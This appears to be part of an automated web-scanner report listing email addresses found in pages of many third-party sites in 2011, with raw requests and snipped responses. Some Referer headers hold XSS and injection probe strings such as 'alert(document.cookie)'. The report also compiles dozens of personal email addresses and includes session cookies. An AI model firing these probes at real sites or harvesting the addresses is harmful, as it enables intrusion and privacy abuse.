* CPAINT - Cross-Platform Asynchronous INterface Toolkit
*
* http://cpaint.sourceforge.net
*
* released under the terms of the LGPL
* see http://www.fsf.org/licensing/licenses/lgpl.txt for
...[SNIP]...
<wiley14@gmail.com>
...[SNIP]...
<dstender@st-webdevelopment.de>
...[SNIP]...

26.6. http://bassistance.de/jquery-plugins/jquery-plugin-validation/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bassistance.de
Path:	/jquery-plugins/jquery-plugin-validation/

Issue detail

The following email addresses were disclosed in the response:

name@apple.com
name@pears.com

Request

GET /jquery-plugins/jquery-plugin-validation/ HTTP/1.1
Host: bassistance.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:06:02 GMT
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
Vary: Cookie,Accept-Encoding
X-Pingback: http://bassistance.de/xmlrpc.php
WP-Super-Cache: Served legacy cache file
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 672388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="mailto:name@apple.com">name@apple.com</a> and <a href="mailto:name@pears.com">name@pears.com</a>
...[SNIP]...

26.7. http://blogs.discovermagazine.com/loom/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.discovermagazine.com
Path:	/loom/

Issue detail

The following email address was disclosed in the response:

dwyersuncreation@aol.com

Request

GET /loom/ HTTP/1.1
Host: blogs.discovermagazine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.8. http://bodyodd.msnbc.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bodyodd.msnbc.msn.com
Path:	/

Issue detail

The following email address was disclosed in the response:

bodyodd@msnbc.com

Request

GET / HTTP/1.1
Host: bodyodd.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.9. http://boyle.newsvine.com/_util/spellcheck/broken-notebook-2.6/cpaint2.inc.compressed.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boyle.newsvine.com
Path:	/_util/spellcheck/broken-notebook-2.6/cpaint2.inc.compressed.js

Issue detail

The following email addresses were disclosed in the response:

dstender@st-webdevelopment.de
wiley14@gmail.com

Request

GET /_util/spellcheck/broken-notebook-2.6/cpaint2.inc.compressed.js HTTP/1.1
Host: boyle.newsvine.com
Proxy-Connection: keep-alive
Referer: http://boyle.newsvine.com/?ab874%22-alert(1)-%221395f8ac659=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; s_cc=true; s_sq=%5B%5BB%5D%5D; vid=8d410fec781195f3ae452149bdba91fe

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:54:29 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 22 Jul 2008 22:32:25 GMT
ETag: "17c51e-2f1b-452a465ed3040"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 17:54:29 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Connection: Keep-Alive
Content-Length: 12059

/**
* CPAINT - Cross-Platform Asynchronous INterface Toolkit
*
* http://cpaint.sourceforge.net
*
* released under the terms of the LGPL
* see http://www.fsf.org/licensing/licenses/lgpl.txt for
...[SNIP]...
<wiley14@gmail.com>
...[SNIP]...
<dstender@st-webdevelopment.de>
...[SNIP]...

26.10. http://cosmiclog.msnbc.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cosmiclog.msnbc.redacted
Path:	/

Issue detail

The following email address was disclosed in the response:

alanboyle@feedback.msnbc.com

Request

GET / HTTP/1.1
Host: cosmiclog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.11. http://cosmiclog.msnbc.redacted/_news/2011/01/28/5943271-egyptians-rush-to-save-tuts-riches/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cosmiclog.msnbc.redacted
Path:	/_news/2011/01/28/5943271-egyptians-rush-to-save-tuts-riches/

Issue detail

The following email address was disclosed in the response:

alanboyle@feedback.msnbc.com

Request

Response

26.12. http://curmudgeons.blogspot.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://curmudgeons.blogspot.com
Path:	/

Issue detail

The following email address was disclosed in the response:

MWHITTINGT@SPRYNET.COM

Request

GET / HTTP/1.1
Host: curmudgeons.blogspot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.13. http://docs.jquery.com/Plugins/Validation previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.jquery.com
Path:	/Plugins/Validation

Issue detail

The following email address was disclosed in the response:

glen@marketo.com

Request

GET /Plugins/Validation HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:08:11 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Wed, 08 Dec 2010 11:37:59 GMT
Content-language: en
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 54082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<li> Remote validation of email field. Try to enter eg. glen@marketo.com
</li>
...[SNIP]...

26.14. http://editorial.autos.redacted/blogs/autosblog.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://editorial.autos.redacted
Path:	/blogs/autosblog.aspx

Issue detail

The following email address was disclosed in the response:

autosblog@live.com

Request

GET /blogs/autosblog.aspx HTTP/1.1
Host: editorial.autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.15. http://fancybox.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fancybox.net
Path:	/

Issue detail

The following email address was disclosed in the response:

janis.skarnelis@gmail.com

Request

GET / HTTP/1.1
Host: fancybox.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:41:18 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 9835

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equ
...[SNIP]...
<input type="hidden" name="business" value="janis.skarnelis@gmail.com" />
...[SNIP]...

26.16. http://forums.silverlight.net/forums/19.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/19.aspx

Issue detail

The following email address was disclosed in the response:

skm.software@yahoo.com

Request

Response

26.17. http://forums.silverlight.net/forums/65.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/65.aspx

Issue detail

The following email address was disclosed in the response:

vnjayakumar@hotmail.com

Request

Response

26.18. http://helenaspopkin.newsvine.com/_util/spellcheck/broken-notebook-2.6/cpaint2.inc.compressed.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://helenaspopkin.newsvine.com
Path:	/_util/spellcheck/broken-notebook-2.6/cpaint2.inc.compressed.js

Issue detail

The following email addresses were disclosed in the response:

dstender@st-webdevelopment.de
wiley14@gmail.com

Request

GET /_util/spellcheck/broken-notebook-2.6/cpaint2.inc.compressed.js HTTP/1.1
Host: helenaspopkin.newsvine.com
Proxy-Connection: keep-alive
Referer: http://helenaspopkin.newsvine.com/?e5470%22-alert(1)-%222158d48b318=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; s_cc=true; s_sq=%5B%5BB%5D%5D; vid=f02f9cb34b8692be67ae217ef748e81a

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:58:21 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 22 Jul 2008 22:32:25 GMT
ETag: "17c51e-2f1b-452a465ed3040"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 17:58:21 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Connection: Keep-Alive
Content-Length: 12059

/**
* CPAINT - Cross-Platform Asynchronous INterface Toolkit
*
* http://cpaint.sourceforge.net
*
* released under the terms of the LGPL
* see http://www.fsf.org/licensing/licenses/lgpl.txt for
...[SNIP]...
<wiley14@gmail.com>
...[SNIP]...
<dstender@st-webdevelopment.de>
...[SNIP]...

26.19. http://i1.codeplex.com/scripts/v17501/i1879048191/ScriptLoader.ashx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i1.codeplex.com
Path:	/scripts/v17501/i1879048191/ScriptLoader.ashx

Issue detail

The following email address was disclosed in the response:

id@Ss.tc

Request

GET /scripts/v17501/i1879048191/ScriptLoader.ashx HTTP/1.1
Host: i1.codeplex.com
Proxy-Connection: keep-alive
Referer: http://silverlight.codeplex.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=aa53c1dyzeonloxydyax0t0n

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: public, max-age=30103376
Expires: Fri, 13 Jan 2012 22:52:34 GMT
Date: Sun, 30 Jan 2011 12:49:38 GMT
Connection: close
Content-Length: 565074

var s_account="msstocodeplex",omniGuidPath="://www.codeplex.com/site/analyticsid.aspx";if(window.location.hostname.toLowerCase().indexOf("codeplex.com")==-1||window.location.hostname.toLowerCase().ind
...[SNIP]...
)`2'';@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s.b=s.
...[SNIP]...

26.20. http://i2.silverlight.net/resources/script/omniture/s_code_dotnet.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i2.silverlight.net
Path:	/resources/script/omniture/s_code_dotnet.min.js

Issue detail

The following email address was disclosed in the response:

id@Ss.tc

Request

GET /resources/script/omniture/s_code_dotnet.min.js?cdn_id=12152010 HTTP/1.1
Host: i2.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 16 Dec 2010 22:47:09 GMT
Accept-Ranges: bytes
ETag: "23f9132c739dcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Cache-Control: max-age=90546331
Date: Sat, 29 Jan 2011 23:14:48 GMT
Connection: close
Content-Length: 22031

function omniGetCookie(b){var d=document.cookie.indexOf(b+"=");if(d!=-1){var c=d+b.length+1;var a=document.cookie.indexOf(";",c);if(a==-1){a=document.cookie.length}return unescape(document.cookie.subs
...[SNIP]...
)`2'';@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s.b=s.
...[SNIP]...

26.21. http://images.hoovers.com/dc/js/omniture/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.hoovers.com
Path:	/dc/js/omniture/s_code.js

Issue detail

The following email address was disclosed in the response:

id@Ss.tc

Request

GET /dc/js/omniture/s_code.js HTTP/1.1
Host: images.hoovers.com
Proxy-Connection: keep-alive
Referer: http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml?7ffa5%22%3balert(document.cookie)//4d5eca5bcd1=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HID=10.1.1.227.122391296352471936

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "8ea2-4acb845d"
Last-Modified: Tue, 06 Oct 2009 17:54:37 GMT
Accept-Ranges: bytes
Content-Length: 36514
Content-Type: application/javascript
P3P: CP="NON DSP COR ADM DEV CONo TELo DELo SAMo OTRo UNRo LEG PRE"
Cache-Control: public, max-age=38904
Expires: Sun, 30 Jan 2011 12:43:11 GMT
Date: Sun, 30 Jan 2011 01:54:47 GMT
Connection: close

<!--

/**
* Omniture javascript
*
* @version $Id: s_code.js,v 1.13 2009/09/19 03:20:36 mkelnar Exp $
* @author $Author: mkelnar $
* @date $Date: 2009/09/19 03:20:36 $
* @copyri
...[SNIP]...
';@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+"
+"s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@"
+"X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s.
...[SNIP]...

26.22. http://informationarbitrage.com/api/read/json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://informationarbitrage.com
Path:	/api/read/json

Issue detail

The following email addresses were disclosed in the response:

andy@andyswan.com
cole@blackstarfunds.com
jennfriend@hotmail.com
laserlikefocus@gmail.com
mutantmagnet@hotmail.com
rlowe_2000@yahoo.com
yaser@yaseranwar.com

Request

GET /api/read/json?callback=jsonp1296398930692&num=50&start=500&_=1296398980063 HTTP/1.1
Host: informationarbitrage.com
Proxy-Connection: keep-alive
Referer: http://informationarbitrage.com/post/3007820135/start-fund-no-big-deal-business-as-usual
X-Requested-With: XMLHttpRequest
Accept: text/javascript, application/javascript, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=169606777.1296398928.1.1.utmcsr=news.ycombinator.com|utmccn=(referral)|utmcmd=referral|utmcct=/news; __utma=169606777.1419262746.1296398928.1296398928.1296398928.1; __utmc=169606777; __utmb=169606777.1.10.1296398928; __qca=P0-737707546-1296398931461; _chartbeat2=9zgu329xqu8nir6e

Response

26.23. http://informationarbitrage.com/api/read/json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://informationarbitrage.com
Path:	/api/read/json

Issue detail

The following email address was disclosed in the response:

jobs@buddymedia.com

Request

GET /api/read/json?callback=jsonp1296398930689&num=50&start=350&_=1296398969872 HTTP/1.1
Host: informationarbitrage.com
Proxy-Connection: keep-alive
Referer: http://informationarbitrage.com/post/3007820135/start-fund-no-big-deal-business-as-usual
X-Requested-With: XMLHttpRequest
Accept: text/javascript, application/javascript, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=169606777.1296398928.1.1.utmcsr=news.ycombinator.com|utmccn=(referral)|utmcmd=referral|utmcct=/news; __utma=169606777.1419262746.1296398928.1296398928.1296398928.1; __utmc=169606777; __utmb=169606777.1.10.1296398928; __qca=P0-737707546-1296398931461; _chartbeat2=9zgu329xqu8nir6e

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
P3P: CP="ALL ADM DEV PSAi COM OUR OTRo STP IND ONL"
Last-Modified: Sun, 30 Jan 2011 06:32:40 GMT
X-Cache-Auto: miss
X-Robots-Tag: noindex
Cache-Control: max-age=900
Vary: Accept-Encoding
X-Tumblr-Usec: D=1299757
Content-Type: text/javascript
Date: Sun, 30 Jan 2011 14:48:35 GMT
X-Varnish: 1726547383
Age: 0
X-Cache: MISS from rack1.tumblr.com
X-Cache-Lookup: MISS from rack1.tumblr.com:80
Via: 1.1 varnish, 1.0 rack1.tumblr.com:80 (squid/2.6.STABLE6)
Connection: keep-alive
Content-Length: 318311

jsonp1296398930689({"tumblelog":{"title":"Information Arbitrage","description":"\r\n<script type=\"text\/javascript\">\r\nvar sc_project=1890207; \r\nvar sc_invisible
...[SNIP]...
<a href=\"mailto:jobs@buddymedia.com\" target=\"_blank\">jobs@buddymedia.com<\/a>
...[SNIP]...

26.24. http://informationarbitrage.com/api/read/json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://informationarbitrage.com
Path:	/api/read/json

Issue detail

The following email addresses were disclosed in the response:

7rauwbs02@sneakemail.com
B@sw.net
Bernard@evenbetteryet.com
agustin_mackinlay@yahoo.com
arudra17@hotmail.com
benjaminwjones@yahoo.com
bgul@alumni.utexas.net
blichtenberger@gmail.com
blueboxmedia@comcast.net
callenergy@hotmail.com
caveatbettor@gmail.com
chuff@ha80.net
ck@redchilinet.com
cmuscarella@gmail.com
cole@blackstarfunds.com
cory.spicer@gmail.com
dan.grossman@sac.com
darringosse@gmail.com
dave@500hats.com
dolf@bellsouth.net
dustymac@gmail.com
earningsbreakout@gmail.com
econtrarian999@gmail.com
fabfiveinvesting@gmail.com
fn@nazeeri.com
gameoverman@gmail.com
george@fatpitchfinancials.com
gfox25@gmail.com
godelmetric@gmail.com
howard@lindzon.com
info@aursi.ca
infoarb@mjo.tc
jboglejr@gmail.com
jebnagel@redacted
jjaffe@thedeal.com
julianleone@yahoo.com
junkmask@ha80.net
jvance@avondaalepartnersllc.com
kalyant@gmail.com
kemperohlmeyer@gmail.com
khyron4eva@gmail.com
kim_pallister@hotmail.com
marc.milgrom@stern.nyu.edu
mernst@gmail.com
michael@tradermike.net
mick@seekingalpa.com
mitch.marklow@gmail.com
mthmchris@gmail.com
naseer@tmn.nu
nikosthenes@gmail.com
nyk202@hotmail.com
perry.still@bofasecurities.com
rajesh@rajeshshakya.com
raznick@gmail.com
retrogaminghacks@gmail.com
richardgaywood@gmail.com
robhays@yahoo.com
roger@monitor110.com
rogere@nyc.rr.com
ruhayatx@gmail.com
sdm2@duke.edu
shike.jebu@gmail.com
tlmcm@sbcglobal.net
trademacro@gmail.com
tziganejl@gmail.com
uh.well@gmail.com
uysalk@hotmail.com
vgodinez@dallasnews.com
videoshoots@yahoo.com
waltermh@gmail.com
warmwaterpenguin@gmail.com
yaser@yaseranwar.com

Request

GET /api/read/json?callback=jsonp1296398930691&num=50&start=450&_=1296398976150 HTTP/1.1
Host: informationarbitrage.com
Proxy-Connection: keep-alive
Referer: http://informationarbitrage.com/post/3007820135/start-fund-no-big-deal-business-as-usual
X-Requested-With: XMLHttpRequest
Accept: text/javascript, application/javascript, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=169606777.1296398928.1.1.utmcsr=news.ycombinator.com|utmccn=(referral)|utmcmd=referral|utmcct=/news; __utma=169606777.1419262746.1296398928.1296398928.1296398928.1; __utmc=169606777; __utmb=169606777.1.10.1296398928; __qca=P0-737707546-1296398931461; _chartbeat2=9zgu329xqu8nir6e

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS)
P3P: CP="ALL ADM DEV PSAi COM OUR OTRo STP IND ONL"
Last-Modified: Sun, 30 Jan 2011 06:32:40 GMT
X-Cache-Auto: miss
X-Robots-Tag: noindex
Cache-Control: max-age=900
Vary: Accept-Encoding
X-Tumblr-Usec: D=2189597
Content-Type: text/javascript
Date: Sun, 30 Jan 2011 14:48:43 GMT
X-Varnish: 1726560678
Age: 0
X-Cache: MISS from rack1.tumblr.com
X-Cache-Lookup: MISS from rack1.tumblr.com:80
Via: 1.1 varnish, 1.0 rack1.tumblr.com:80 (squid/2.6.STABLE6)
Connection: keep-alive
Content-Length: 457651

jsonp1296398930691({"tumblelog":{"title":"Information Arbitrage","description":"\r\n<script type=\"text\/javascript\">\r\nvar sc_project=1890207; \r\nvar sc_invisible
...[SNIP]...
<p>EMAIL: bgul@alumni.utexas.net<\/p>
...[SNIP]...
<p>EMAIL: yaser@yaseranwar.com<\/p>
...[SNIP]...
<p>EMAIL: mthmchris@gmail.com<\/p>
...[SNIP]...
<p>EMAIL: fabfiveinvesting@gmail.com<\/p>
...[SNIP]...
<p>EMAIL: naseer@tmn.nu<\/p>
...[SNIP]...
<p>EMAIL: darringosse@gmail.com<\/p>
...[SNIP]...
<p>EMAIL: earningsbreakout@gmail.com<\/p>
...[SNIP]...
<p>EMAIL: howard@lindzon.com<\/p>
...[SNIP]...
<p>EMAIL: yaser@yaseranwar.com<\/p>
...[SNIP]...
<p>EMAIL: michael@tradermike.net<\/p>
...[SNIP]...
<p>EMAIL: howard@lindzon.com<\/p>
...[SNIP]...
<p>EMAIL: jjaffe@thedeal.com<\/p>
...[SNIP]...
<p>EMAIL: videoshoots@yahoo.com<\/p>
...[SNIP]...
<p>EMAIL: robhays@yahoo.com<\/p>
...[SNIP]...
<p>EMAIL: rogere@nyc.rr.com<\/p>
...[SNIP]...
<p>EMAIL: yaser@yaseranwar.com<\/p>
...[SNIP]...
<p class=\"times\">EMAIL: junkmask@ha80.net<\/p>
...[SNIP]...
<p class=\"times\">EMAIL: tlmcm@sbcglobal.net<\/p>
...[SNIP]...
<p class=\"times\">EMAIL: arudra17@hotmail.com<\/p>
...[SNIP]...
<p class=\"times\">EMAIL: yaser@yaseranwar.com<\/p>
...[SNIP]...
<p class=\"times\">EMAIL: marc.milgrom@stern.nyu.edu<\/p>
...[SNIP]...
<p>EMAIL: michael@tradermike.net<\/p>
...[SNIP]...
<p>EMAIL: yaser@yaseranwar.com<\/p>
...[SNIP]...
<p>EMAIL: raznick@gmail.com<\/p>
...[SNIP]...
<p>EMAIL: howard@lindzon.com<\/p>
...[SNIP]...
<p>EMAIL: mernst@gmail.com<\/p>
...[SNIP]...
<p>EMAIL: nyk202@hotmail.com<\/p>
...[SNIP]...
<p>EMAIL: gfox25@gmail.com<\/p>
...[SNIP]...
<p>EMAIL: mitch.marklow@gmail.com<\/p>
...[SNIP]...
<p>EMAIL: cory.spicer@gmail.com<\/p>
...[SNIP]...
<p>EMAIL: retrogaminghacks@gmail.com<\/p>
...[SNIP]...
<p>EMAIL: jebnagel@redacted<\/p>
...[SNIP]...
<p>EMAIL: caveatbettor@gmail.com<\/p>
...[SNIP]...
<p>EMAIL: 7rauwbs02@sneakemail.com<\/p>
...[SNIP]...
<p>EMAIL: yaser@yaseranwar.com<\/p>
...[SNIP]...
<p>EMAIL: sdm2@duke.edu<\/p>
...[SNIP]...
<p>EMAIL: ck@redchilinet.com<\/p>
...[SNIP]...
<p>EMAIL: kemperohlmeyer@gmail.com<\/p>
...[SNIP]...
<p>EMAIL: kalyant@gmail.com<\/p>
...[SNIP]...
<p>EMAIL: trademacro@gmail.com<\/p>
...[SNIP]...
<p>EMAIL: kim_pallister@hotmail.com<\/p>
...[SNIP]...
<p>EMAIL: yaser@yaseranwar.com<\/p>
...[SNIP]...
<p>EMAIL: michael@tradermike.net<\/p>
...[SNIP]...
<p>EMAIL: blichtenberger@gmail.com<\/p>
...[SNIP]...
<p>EMAIL: rogere@nyc.rr.com<\/p>
...[SNIP]...
<p>EMAIL: yaser@yaseranwar.com<\/p>
...[SNIP]...
<p>EMAIL: michael@tradermike.net<\/p>
...[SNIP]...
<p>EMAIL: howard@lindzon.com<\/p>
...[SNIP]...
<p>EMAIL: nikosthenes@gmail.com<\/p>
...[SNIP]...
<p>EMAIL: george@fatpitchfinancials.com<\/p>
...[SNIP]...
<p>EMAIL: ruhayatx@gmail.com<\/p>
...[SNIP]...
<p>EMAIL: richardgaywood@gmail.com<\/p>
...[SNIP]...
<p>EMAIL: waltermh@gmail.com<\/p>
...[SNIP]...
<p>EMAIL: warmwaterpenguin@gmail.com<\/p>
...[SNIP]...
<p>EMAIL: dave@500hats.com<\/p>
...[SNIP]...
<p>EMAIL: perry.still@bofasecurities.com<\/p>
...[SNIP]...
<p>EMAIL: roger@monitor110.com<\/p>
...[SNIP]...
<p>EMAIL: rajesh@rajeshshakya.com<\/p>
...[SNIP]...
<p>EMAIL: Bernard@evenbetteryet.com<\/p>
...[SNIP]...
<p>EMAIL: info@aursi.ca<\/p>
...[SNIP]...
